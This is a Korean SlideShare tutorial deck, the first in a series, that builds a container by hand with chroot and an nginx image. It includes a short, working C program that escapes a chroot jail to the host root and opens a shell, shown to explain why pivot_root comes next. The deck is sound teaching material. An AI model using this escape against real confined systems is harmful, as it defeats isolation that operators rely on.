SlideShare une entreprise Scribd logo

도커없이 컨테이너 만들기 1편

Sam Kim
Sam Kim

도커 없이 리눅스 커맨드만으로 컨테이너를 완성해 봅니다

Logiciels
1  sur  48
Télécharger pour lire hors ligne
도커 없이 컨테이너 만들기 1편 Sam.0 실습과 함께 완성해보는
실습은 . . . ● 맥 환경에서 VirtualBox + Vagrant 기반으로 준비되었습니다 ○ 맥 이외의 OS 환경도 괜찮습니다만 ○ 원활한 실습을 위해서 ○ “VirtualBox or VMware + Vagrant”는 권장드립니다. ● 실습환경 구성을 위한 Vagrantfile을 제공합니다. 실습을 위한 사전 준비 사항
Vagrantfile ● 오른쪽의 텍스트를 복사하신 후 ● 로컬에 Vagrantfile로 저장하여 사용하면 됩니다. ● vagrant 사용법은 공식문서를 참고해 주세요 https://www.vagrantup.com/docs/i ndex 실습을 위한 사전 준비 사항 BOX_IMAGE = "bento/ubuntu-18.04" HOST_NAME = "ubuntu1804" $pre_install = <<-SCRIPT echo ">>>> pre-install <<<<<<" sudo apt-get update && sudo apt-get -y install gcc && sudo apt-get -y install make && sudo apt-get -y install pkg-config && sudo apt-get -y install libseccomp-dev && sudo apt-get -y install tree && sudo apt-get -y install jq && sudo apt-get -y install bridge-utils echo ">>>> install go <<<<<<" curl -O https://storage.googleapis.com/golang/go1.15.7.linux-amd64.tar.gz > /dev/null 2>&1 && tar xf go1.15.7.linux-amd64.tar.gz && sudo mv go /usr/local/ && echo 'PATH=$PATH:/usr/local/go/bin' | tee /home/vagrant/.bash_profile echo ">>>>> install docker <<<<<<" sudo apt-get -y install apt-transport-https ca-certificates curl gnupg-agent software-properties-common > /dev/null 2>&1 && sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - && sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" && sudo apt-get update && sudo apt-get -y install docker-ce docker-ce-cli containerd.io > /dev/null 2>&1 SCRIPT Vagrant.configure("2") do |config| config.vm.define HOST_NAME do |subconfig| subconfig.vm.box = BOX_IMAGE subconfig.vm.hostname = HOST_NAME subconfig.vm.network :private_network, ip: "192.168.104.2" subconfig.vm.provider "virtualbox" do |v| v.memory = 1536 v.cpus = 2 end subconfig.vm.provision "shell", inline: $pre_install end end
# sudo -Es 실습 계정 (root) # cd /tmp 실습 폴더 vagrant + virtual vm ubuntu 18.04 docker 20.10.5 * 도커 이미지 다운로드 및 컨테이너 비교를 위한 용도로 사용합니다. 기타 설치된 툴 ~ tree, jq, brctl, … 등 실습을 위한 툴 Vagrantfile 제공 환경 실습을 위한 사전 준비 사항
컨테이너 ? 도커? 클라우드 ? ubuntu:latest ..OS? VMware 같은 건가?
도커 ? https://docs.docker.com/get-started/overview/ 회사명 이면서 제품명 → 컨테이너를 다루는 플랫폼
컨테이너 ? 격리된 환경과 통제된 리소스에서 실행되는 프로세스 그룹 호스트 안에 따로 한 살림 차려준달까 시스템리소스 (cpu, mem, ..) processes processes 집 안의 집 ~ “컴퓨터 안 의 컴퓨터” https://jessicagreben.medium.com/what-is-the-difference-between-a-process-a-container-and-a-vm-f36ba0f8a8f7
컨테이너? VM 보다 가볍다 Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App Strong Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container Weak Isolation 컨테이너 환경
컨테이너? VM 보다 가볍다 왜 ? Guest OS가 없다 (호스트 OS를 공유) Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App 스트롱 ~ Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container 약한 Isolation 컨테이너 환경
컨테이너 vs VM https://artistdata.tistory.com/5 최대소수연산(sysbench) 소요시간 비교 압축 성능 비교 (LZMA benchmark) for CPU performance RAM Speed 비교 디스크 I/O 성능비교 (IOzone benchmark) 성능비교 ~ 컨테이너가 빠름 빠름 ~
1979 chroot 2000 Jails 2013 2002 mount ns 2006 uts, ipc ns 2009 net ns 2012 user ns LXC (LinuX Containers) 2008 pid ns, cgroup 컨테이너의 역사 컨테이너의 시작은 1979년 chroot 로 부터 ~
chroot ? change root directory ‘ / ’ 리눅스 파일시스템은 모든 파일 및 디렉토리가 “root (/)” 로 부터 시작된다. bin boot chroot etc lib proc usr var / (root filesystem)
chroot ? change root directory ‘ / ’ 원격 유저(FTP 등)를 특정 디렉토리 경로에 가두기 위한 용도 등으로 사용됨 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail Hacker 따라서.. 특정 디렉토리 경로를 root로 지정할 수 있으면 해당 경로에 프로세스를 가둘 수 있다는 점에 착안 ~
chroot 실습 chroot로 컨테이너를 만들어 보자 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail
chroot 실습 chroot는 새로운 경로(NEWROOT)와 실행할 커맨드를 인자로 받습니다. # man chroot ~ 커맨드를 따로 지정하지 않으면 default 커맨드 (/bin/sh) 로 동작합니다.
# mkdir new-root # chroot new-root /bin/bash new-root 폴더를 만들고, chroot를 해봅시다 chroot 실습
# chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 ~ chroot의 커맨드(/bin/bash)는 new-root 경로를 기준으로 합니다 즉, 실행할 커맨드가 경로에 없다고 에러 빽 ~
chroot 실습 # which bash /bin/bash # mkdir -p new-root/bin # cp /bin/bash new-root/bin /bin/bash 파일을 new-root/bin 으로 복사해주세요
# chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 왜 또 ~ ㅠ 다시 실행해 보지만 …
# ldd /bin/bash ldd prints the shared libraries required 참고) man ldd (list dynamic dependencies) /bin/bash에서 실행 시 참조하는 라이브러리들이 있었군요 chroot 실습
chroot 실습 bash 실행을 위한 라이브러리도 복사해주세요 한땀한땀 ~ # mkdir new-root/lib # cp /lib/x86_64-linux-gnu/libtinfo.so.5 new-root/lib/ # cp /lib/x86_64-linux-gnu/libdl.so.2 new-root/lib/ # cp /lib/x86_64-linux-gnu/libc.so.6 new-root/lib/ # mkdir new-root/lib64 # cp /lib64/ld-linux-x86-64.so.2 new-root/lib64/ Q) linux-vdso.so.1 은 왜 복사안해요 ? A) *-vdso 는 커널레벨에서제공되는 공유 라이브러리입니다. 참고) man vdso (virtual dynamic shared object)
chroot 실습 # chroot new-root /bin/bash bash-4.4# 성공 ~ 오.. 뭔가 다른 터미널에 들어온 기분이네요
chroot 실습 But … 세상일이라는게 호락호락 하지 않네요 ...
chroot 실습 ls 명령어도 복사해 넣어봅시다 먼저, exit 를 입력하여 chroot로 실행된 프로세스를 종료합니다 bash-4.4# exit #
chroot 실습 ls 명령어도 복사해 넣어봅시다 # cp /bin/ls new-root/bin # cp /lib/x86_64-linux-gnu/libselinux.so.1 . . . 이하 생략 . . . 직접 하실 수 있겠지요 ? 앞서 bash 복사와 동일합니다 :-) 한땀한땀 ~ cp 해주세요
chroot 실습 다시 chroot 로 new-root의 bash를 실행해 보세요 # chroot new-root /bin/bash bash-4.4# 이번에는 ls 도 동작합니다
chroot 실습 ls 로 확인해보니 “/” (root) 가 달라졌습니다 원래 root (“/”)
bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail chroot 실습 그리고, root 밖으로 벗어날 수 없습니다 원래 root (“/”)
chroot 실습 cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요 그렇습니다 . 사용하고 싶은 명령어는 한땀한땀 넣어주어야 합니다. bash와 라이브러리들을 복사해온 것 처럼 말이죠
chroot 실습 new-root copy copy copy cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요
chroot 실습 필요한 프로그램들은 이처럼 한땀한땀 복사해 넣어야 합니다. 저는 욕심을 좀 부려보았습니다. ps 를 해보기 위해 mount 까지 넣어보았습니다. new-root
그것이 바로 이미지(image) 입니다 :-) 흔히들, “도커 이미지”라고 부르는 그것 말이죠. 일종의 tarball 이라고 생각하면 됩니다. nginx image tarball 누군가 미리 필요한 것들을 모아 둔 것을 가져다 쓰면 편하겠죠 ? chroot + 이미지 실습
말 나온김에 이미지를 가져와 볼까요 ? nginx-root # cd /tmp # mkdir nginx-root 일단, /tmp 에 “nginx-root” 라는 새로운 폴더를 하나 만들어 줍시다. chroot + 이미지 실습
새로 만든 nginx-root 라는 경로에 nginx 이미지를 풀어줄 건데요 이 명령은 아래의 단계를 수행합니다. 1. 이미지 저장소로 부터 nginx:latest 이미지를 가지고 와서 2. tarball로 export (압축) 한 것을 3. nginx-root 경로에 풀어줍니다. 말 나온김에 이미지를 가져와 볼까요 ? nginx-root nginx image tarball # docker export $(docker create nginx:latest) | tar -C nginx-root -xvf - chroot + 이미지 실습
이처럼 필요한 이미지를 풀어놓은 경로를 chroot 를 해주면 ~ # chroot nginx-root /bin/sh # ls 명령도 동작을 하네요 ~ 누군가 필요한 것들을 잘 모아 놓았습니다. chroot + 이미지 실습
nginx image tarball 의 내용과 동일합니다 … 압축을 풀어놓은 그대로죠 ㅎㅎ nginx image tarball = 동일 chroot + 이미지 실습
nginx 도 한번 실행해 볼까요? chroot + 이미지 실습
터미널창을 하나 더 열어서 실제 접속이 되는지 확인해 보세요 # curl localhost 터미널 #2 접속이 잘 되었다면 성공 ~ chroot + 이미지 실습
지금까지 nginx 이미지와 chroot를 이용하여 nginx 웹서버를 실행해 보았습니다 nginx image tarball nginx-root “실제 컨테이너 처럼” 프로그램 실행에 필요한 파일들을 모아놓고 해당 경로를 root로 하여 프로세스를 실행하는 것을 재현해 보았는데요 chroot + 이미지 실습
그런데 말입니다 … chroot에는 치명적인 문제가 있습니다 new-root chroot chroot 문제점
chroot 문제점 그것은 바로 ~~~ 탈옥이 가능하다는 점입니다 … bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Angry Hacker
chroot 에서 탈출해보자 탈옥 코드 # vi escape_chroot.c #include <sys/stat.h> #include <unistd.h> int main(void) { mkdir(".out", 0755); chroot(".out"); chdir("../../../../../"); chroot("."); return execl("/bin/sh", "-i", NULL); }
chroot 에서 탈출해보자 탈옥 코드를 컴파일하고 new-root에 복사합니다 # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root /bin/bash bash-4.4# ls / change root 는 잘됐군 ~
chroot 에서 탈출해보자 escape_chroot 를 실행하면 ... # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root bash-4.4# ls / bash-4.4# ./escape_chroot # ls / bin escape_chroot lib usr / (Fake root) 탈옥
탈옥에 성공했다는 것은 … 실제 루트 (/)를 취득했다는 얘기가 되겠죠 ㅠ.ㅠ chroot 에서 탈출해보자 bin escape_chroot lib usr / (Fake root)
chroot 문제점 탈옥 말고도 … chroot 가 가지고 있는 문제점은 많습니다. ~ 호스트와의 격리 문제, 리소스 제한, 보안 ... 앞으로 이러한 문제들 하나하나 해결해 가면서 함께 완전한 컨테이너를 만들어 보시죠 :-)
2편 예고 다음 편에서는 chroot 의 탈옥문제를 해결하는 방법으로써 pivot_root에 대해 다루도록 하겠습니다
END

Recommandé

도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편Sam Kim
 
도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편Sam Kim
 
Linux kernel tracing
Linux kernel tracingLinux kernel tracing
Linux kernel tracingViller Hsiao
 
Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1 Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1 Sam Kim
 
Docker internals
Docker internalsDocker internals
Docker internalsRohit Jnagal
 
Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)
Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)
Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)NTT DATA Technology & Innovation
 
[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화
[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화
[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화OpenStack Korea Community
 
Argocd up and running
Argocd up and runningArgocd up and running
Argocd up and runningRaphaël PINSON
 

Recommandé

도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편Sam Kim
 
도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편Sam Kim
 
Linux kernel tracing
Linux kernel tracingLinux kernel tracing
Linux kernel tracingViller Hsiao
 
Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1 Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1 Sam Kim
 
Docker internals
Docker internalsDocker internals
Docker internalsRohit Jnagal
 
Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)
Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)
Kubernetes 基盤における非機能試験の deepdive(Kubernetes Novice Tokyo #17 発表資料)NTT DATA Technology & Innovation
 
[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화
[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화
[OpenStack 하반기 스터디] Docker를 이용한 OpenStack 가상화OpenStack Korea Community
 
Argocd up and running
Argocd up and runningArgocd up and running
Argocd up and runningRaphaël PINSON
 
Rancher と GitLab を使う3つの理由
Rancher と GitLab を使う3つの理由Rancher と GitLab を使う3つの理由
Rancher と GitLab を使う3つの理由Tetsurou Yano
 
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術までAkihiro Suda
 
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)NTT DATA Technology & Innovation
 
ansible why ?
ansible why ?ansible why ?
ansible why ?Yashar Esmaildokht
 
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...Edureka!
 
OpenvSwitchの落とし穴
OpenvSwitchの落とし穴OpenvSwitchの落とし穴
OpenvSwitchの落とし穴Takashi Naito
 
Getting Started - Ansible Galaxy NG
Getting Started - Ansible Galaxy NGGetting Started - Ansible Galaxy NG
Getting Started - Ansible Galaxy NGHideki Saito
 
TripleO Deep Dive
TripleO Deep DiveTripleO Deep Dive
TripleO Deep DiveTakashi Kajinami
 
Kubernetes Networking
Kubernetes NetworkingKubernetes Networking
Kubernetes NetworkingCJ Cullen
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingViller Hsiao
 
DevOps avec Ansible et Docker
DevOps avec Ansible et DockerDevOps avec Ansible et Docker
DevOps avec Ansible et DockerStephane Manciot
 
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...SlideTeam
 
Boosting I/O Performance with KVM io_uring
Boosting I/O Performance with KVM io_uringBoosting I/O Performance with KVM io_uring
Boosting I/O Performance with KVM io_uringShapeBlue
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101SUSE Labs Taipei
 
Docker networking Tutorial 101
Docker networking Tutorial 101Docker networking Tutorial 101
Docker networking Tutorial 101LorisPack Project
 
[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅NAVER D2
 
kubernetes : From beginner to Advanced
kubernetes : From beginner to Advancedkubernetes : From beginner to Advanced
kubernetes : From beginner to AdvancedInho Kang
 
【ヒカラボ】RDS for MySQL → Aurora
【ヒカラボ】RDS for MySQL → Aurora【ヒカラボ】RDS for MySQL → Aurora
【ヒカラボ】RDS for MySQL → AuroraYuki Kanazawa
 
FizzBuzzで学ぶJavaの進化
FizzBuzzで学ぶJavaの進化FizzBuzzで学ぶJavaの進化
FizzBuzzで学ぶJavaの進化虎の穴 開発室
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveNetronome
 
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기Chanwoong Kim
 
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스
 

Contenu connexe

Tendances

Rancher と GitLab を使う3つの理由
Rancher と GitLab を使う3つの理由Rancher と GitLab を使う3つの理由
Rancher と GitLab を使う3つの理由Tetsurou Yano
 
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術までAkihiro Suda
 
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)NTT DATA Technology & Innovation
 
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...Edureka!
 
OpenvSwitchの落とし穴
OpenvSwitchの落とし穴OpenvSwitchの落とし穴
OpenvSwitchの落とし穴Takashi Naito
 
Getting Started - Ansible Galaxy NG
Getting Started - Ansible Galaxy NGGetting Started - Ansible Galaxy NG
Getting Started - Ansible Galaxy NGHideki Saito
 
Kubernetes Networking
Kubernetes NetworkingKubernetes Networking
Kubernetes NetworkingCJ Cullen
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingViller Hsiao
 
DevOps avec Ansible et Docker
DevOps avec Ansible et DockerDevOps avec Ansible et Docker
DevOps avec Ansible et DockerStephane Manciot
 
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...SlideTeam
 
Boosting I/O Performance with KVM io_uring
Boosting I/O Performance with KVM io_uringBoosting I/O Performance with KVM io_uring
Boosting I/O Performance with KVM io_uringShapeBlue
 
Docker networking Tutorial 101
Docker networking Tutorial 101Docker networking Tutorial 101
Docker networking Tutorial 101LorisPack Project
 
[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅NAVER D2
 
kubernetes : From beginner to Advanced
kubernetes : From beginner to Advancedkubernetes : From beginner to Advanced
kubernetes : From beginner to AdvancedInho Kang
 
【ヒカラボ】RDS for MySQL → Aurora
【ヒカラボ】RDS for MySQL → Aurora【ヒカラボ】RDS for MySQL → Aurora
【ヒカラボ】RDS for MySQL → AuroraYuki Kanazawa
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveNetronome
 

Tendances (20)

Rancher と GitLab を使う3つの理由
Rancher と GitLab を使う3つの理由Rancher と GitLab を使う3つの理由
Rancher と GitLab を使う3つの理由
 
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
Dockerセキュリティ: 今すぐ役に立つテクニックから,次世代技術まで
 
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
限界性能試験を自動化するOperatorを作ってみた(Kubernetes Novice Tokyo #14 発表資料)
 
ansible why ?
ansible why ?ansible why ?
ansible why ?
 
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
What Is Kubernetes | Kubernetes Introduction | Kubernetes Tutorial For Beginn...
 
OpenvSwitchの落とし穴
OpenvSwitchの落とし穴OpenvSwitchの落とし穴
OpenvSwitchの落とし穴
 
Getting Started - Ansible Galaxy NG
Getting Started - Ansible Galaxy NGGetting Started - Ansible Galaxy NG
Getting Started - Ansible Galaxy NG
 
TripleO Deep Dive
TripleO Deep DiveTripleO Deep Dive
TripleO Deep Dive
 
Kubernetes Networking
Kubernetes NetworkingKubernetes Networking
Kubernetes Networking
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracing
 
DevOps avec Ansible et Docker
DevOps avec Ansible et DockerDevOps avec Ansible et Docker
DevOps avec Ansible et Docker
 
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
Kubernetes Docker Container Implementation Ppt PowerPoint Presentation Slide ...
 
Boosting I/O Performance with KVM io_uring
Boosting I/O Performance with KVM io_uringBoosting I/O Performance with KVM io_uring
Boosting I/O Performance with KVM io_uring
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
 
Docker networking Tutorial 101
Docker networking Tutorial 101Docker networking Tutorial 101
Docker networking Tutorial 101
 
[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅
 
kubernetes : From beginner to Advanced
kubernetes : From beginner to Advancedkubernetes : From beginner to Advanced
kubernetes : From beginner to Advanced
 
【ヒカラボ】RDS for MySQL → Aurora
【ヒカラボ】RDS for MySQL → Aurora【ヒカラボ】RDS for MySQL → Aurora
【ヒカラボ】RDS for MySQL → Aurora
 
FizzBuzzで学ぶJavaの進化
FizzBuzzで学ぶJavaの進化FizzBuzzで学ぶJavaの進化
FizzBuzzで学ぶJavaの進化
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep Dive
 

Similaire à 도커없이 컨테이너 만들기 1편

[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기Chanwoong Kim
 
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스
 
[오픈소스컨설팅]Docker on Kubernetes v1
[오픈소스컨설팅]Docker on Kubernetes v1[오픈소스컨설팅]Docker on Kubernetes v1
[오픈소스컨설팅]Docker on Kubernetes v1Ji-Woong Choi
 
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 DockerXECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 DockerXpressEngine
 
[1A6]Docker로 보는 서버 운영의 미래
[1A6]Docker로 보는 서버 운영의 미래[1A6]Docker로 보는 서버 운영의 미래
[1A6]Docker로 보는 서버 운영의 미래NAVER D2
 
Docker 사용가이드 public v0.1
Docker 사용가이드 public v0.1Docker 사용가이드 public v0.1
Docker 사용가이드 public v0.1Steve Shim
 
Docker.소개.30 m
Docker.소개.30 mDocker.소개.30 m
Docker.소개.30 mWonchang Song
 
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축Ji-Woong Choi
 
망고100 보드로 놀아보자 11
망고100 보드로 놀아보자 11망고100 보드로 놀아보자 11
망고100 보드로 놀아보자 11종인 전
 
우분투에 시스템콜 추가하기
우분투에 시스템콜 추가하기우분투에 시스템콜 추가하기
우분투에 시스템콜 추가하기Hoyoung Jung
 
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기KTH, 케이티하이텔
 
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기소리 강
 
[17.01.19] docker introduction (Korean Version)
[17.01.19] docker introduction (Korean Version)[17.01.19] docker introduction (Korean Version)
[17.01.19] docker introduction (Korean Version)Ildoo Kim
 
[Nomad connection]docker seminar 15.10.08
[Nomad connection]docker seminar 15.10.08[Nomad connection]docker seminar 15.10.08
[Nomad connection]docker seminar 15.10.08Nomad Connection, Inc.
 
cross compile
cross compilecross compile
cross compilehe4722
 
Virtual Development Environment Setting
Virtual Development Environment SettingVirtual Development Environment Setting
Virtual Development Environment SettingKwangyoun Jung
 
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)Ji-Woong Choi
 
docker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
docker on GCE ( JIRA & Confluence ) - GDG Korea Clouddocker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
docker on GCE ( JIRA & Confluence ) - GDG Korea CloudJude Kim
 
Deploying Hyperledger Fabric on Kubernetes.pptx
Deploying Hyperledger Fabric on Kubernetes.pptxDeploying Hyperledger Fabric on Kubernetes.pptx
Deploying Hyperledger Fabric on Kubernetes.pptxwonyong hwang
 

Similaire à 도커없이 컨테이너 만들기 1편 (20)

[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
 
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
